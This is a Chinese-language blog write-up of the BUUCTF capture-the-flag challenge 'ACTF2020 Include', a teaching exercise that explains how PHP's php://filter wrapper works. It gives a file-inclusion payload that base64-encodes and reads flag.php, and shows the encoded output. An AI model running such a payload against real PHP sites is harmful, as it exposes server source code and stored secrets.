buuctf-web入门-[ACTF2020 新生赛]Include1

最新推荐文章于 2024-06-04 14:04:24 发布
最新推荐文章于 2024-06-04 14:04:24 发布
阅读量93 收藏
点赞数 3
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80137226/article/details/136968226
版权

打开靶场

发现有一个tips点击一下

根据题目的提示大概是需要进行文件包含

可以尝试php为协议构造

构造playload

file=php://filter/read=convert.base64-encode/resource=flag.php

得到

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ODBhN2Q1MmUtN2NkMi00YTMwLWIzZTctMzViNmI2ODkwYTc0fQo=

再对其进行base64解密

本题重点是对php伪协议进行理解

php://filter 协议

    是格式
    是可选参数,有read和write,字面意思就是读和写
    是过滤器。主要有四种:字符串过滤器,转换过滤器,压缩过滤器,加密过滤器。filter里可以用一或多个过滤器(中间用|隔开),这也为解题提供了多种方法,灵活运用过滤器是解题的关键。这里的过滤器是把文件flag.php里的代码转换(convert)为base64编码(encode)
    是必选参数,后面写你要处理的文件名
————————————————

                            版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
                        
原文链接:https://blog.csdn.net/weixin_45642610/article/details/112427044

2301_80137226
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码 描述 平台源代码: : 挑战的Dockerfiles: : 挑战性 . ├── forensics │   └── forensics100-You_Sha_Bi ├── misc │   ├── misc100-baso4 │   ├── misc100-md5-collision │   ├── misc150-compare-flag │   ├── misc200-attack │   └── misc250-keyboard ├── pwn │   ├── pwn100-bof-x86-64 │   ├── pwn100-shellcode-x86-64 │   ├── pwn150-static-x86-64 │   ├── pwn200-actf-run-circles │   ├── pwn200-shorter-shellc
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
PPJEmailPicker UITextField替换以选择多个电子邮件 演示版 使用CocoaPods进行安装 播客文件 Podfile添加到您的Podfile : pod 'PPJEmailPicker' 用法 以编程方式 第1步-导入标题 # import " PPJEmailPicker.h " 第2步-创建对象 -(PPJEmailPicker *) createAutoCompleteFieldWithFrame:( CGRect )frame { PPJEmailPicker * actf = [[PPJEmailPicker alloc ] initWithFrame: frame]; actf. pickerDelegate = self; actf. possibleStrings = [[ListOfEmails emails ] mutableCopy
buuctf(web)部分实操题和知识点
Z11762的博客
04-18 690
这里跟前面做过的一个看后端源码的题很相似,就是:PHP的文件包含函数有一个「特性」,被包含的文件内容中,如果是「代码」则会执行,而不会在页面中展示;针对这一特性,我们可以使用PHP伪协议对文件内容进行「编码」,编码后的文件内容由于不能被执行,会展示在页面中,而后再将页面中的内容复制到本地进行「解码」,即可查看文件内容,拿到 flag。"https://Sycsecret.buuoj.cn" 是一个URL,指向一个名为 "Sycsecret.buuoj.cn" 的网站或资源。之后界面显示“No!
BUUCTF Web [ACTF2020 新生]Include,阿里P8大佬整理
2301_76224054的博客
04-17 950
进入题目链接后只有一个「链接」点击链接后来到 falg.php 页面,里面是一句作者深情的「问候」。
BUUCTF Web [ACTF2020 新生]Include
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Include一、题目简介二、思路分析三、解题步骤1)包含 flag.php2)PHP伪协议编码文件3)解码文件内容四、总结 一、题目简介 进入题目链接后只有一个「链接」 点击链接后来到 falg.php 页面,里面是一句作者深情的「问候」。 二、.
BUUCTF-web入门(一)
wwwyyyxxxx的博客
03-05 409
重点是下面的切割字符串部分造成漏洞,$_page值是$page经过url解码以后,在最后拼接一个?以后的字符串中的第一个?然后就是想办法绕过checkFile的白名单检查,这里第一个判断可以肯定不成立,第二个只有是只有白名单里的才能返回true。/abc'部分就好办了,直接'../' 返回上层目录。file=hint.php看看hint.php,提示flag在ffffllllaaaagggg。
web buuctf [ACTF2020 新生]Include1
weixin_44214568的博客
08-04 510
1.线索:查看tips页面源代码,只有一个标签传参链接?file=flag.php; 点击查看传参后几面源代码,网页上只有“Can you find out the flag?”一句话 2.分析:没有sql注入点 提示can you find out the flag,且传递的file是flag.php flag是否在flag.php中 尝试查看一下flag.php代码 3.知识储备: php...
[ACTF2020 新生]Include1
2201_75556700的博客
01-21 890
6.这段代码的意思是如果 GET 请求中包含了名为 file 的参数,则将该参数的值作为文件名,包含该文件;如果 file 参数的包含了 php://input、zip://、phar:// 或 data: 等协议,则会输出字符串 hacker!3.我们想到这里会用到php伪协议,第一种就是先尝试php://input,发现被过滤了。7.这时候我们用filter伪协议去读取flag.php文件。4.尝试第二种php://filter,发现页面有显示一串字符。5.将字符串base64解码后得到一串代码。
BUUCTFWeb真题学习整理(一)
CTF小白的博客
08-01 5029
目录WEB1—WarmUp (任意文件包含漏洞)WEB2—高明的黑客(fuzz脚本)WEB3—easy_tornado (服务端模板注入(ssti攻击))WEB4—Hack World(时间盲注)WEB5—admin(unicode欺骗)WEB6—piapiapia (一个源码中有防止sql注入的反序列化漏洞) BUU上的题基本都是比真题,还是很有借鉴意义的,安利一波https://buuoj...
BUUCTF web(一)
热门推荐
Lemon's blog
10-16 1万+
前言:最近参加了一场CTF,菜的一批,接下来多练习web题、MISC、密码学,多思考,提高一下自己做题的思路,以及代码审计、编写脚本的能力。 [HCTF 2018]WarmUp 查看源码,发现<!--source.php-->,打开发现源码 <?php highlight_file(__FILE__); if (! empty($_REQUEST['file...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
BUUCTFACTF2020 新生Include1 write up
GZWZ_的博客
03-30 2966
鉴于前几篇wp写的有些过于小白,我以后会改的┭┮﹏┭┮(web本就逆天,死在路上很正常)!
前端开发记录
qq_25806839的博客
05-31 264
【代码】前端开发记录。
浏览器阻止屏幕息屏,js阻止浏览器息屏,Web网页阻止息屏
最新发布
lianmindiandi
06-04 157
比如打开一个浏览器页面(比如大屏),想让它一直显示着,而不是过几分钟不操作就屏幕黑了.(电脑有设置电脑不操作就会多长时间就会息屏睡眠,如果要求每个客户都去操作一下电脑设置一下从不睡眠,这很不友好和现实.而且我也只想客户在大屏的时候才这样,其他页面就正常,按电脑设定走)如果想看看效果,可以试试,最好把电脑息屏改成1分钟,要不然等太久了, 累啊…(除非等待时间玩把手游😁)这是看了前端css大佬张鑫旭写的一波文章,观后有感😄,如果大家不认识,百度一波。是不是很简单,但是这里面还有一些注意点,
从CSV到数据库(简易)
qq_31856061的博客
05-31 403
需求:客户上传CSV文档,要求CSV文档内容查重/插入/更新相关数据。框架:jdbcTemplate、commons-io、DB:oracle相关依赖:这里本来打算用的2.11.0,无奈正式项目那边用老版本1.3.1,新版本对类型支持和转换好一点。不过无伤大雅。
Typescript高级: 深入理解extends keyof语法
Wang的专栏
06-02 808
在TypeScript中,extends关键字是类型系统中一个极其重要的组成部分它不仅用于类的继承,也是类型兼容性检查和泛型约束的关键机制特别是当它与keyof关键字结合,形成的结构时它为类型系统带来了强大的灵活性和表达能力,让我们能够在泛型中对对象的属性进行操作和约束。
[ACTF2020 新生]Include 1
09-19
[ACTF2020 新生]Include 1是一道与PHP文件包含漏洞相关的题目。根据提供的引用内容,代码中对$file参数进行了过滤,防止了一些常见的恶意输入。但是通过引用中给出的payload,可以绕过输入的过滤,进一步读取flag....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值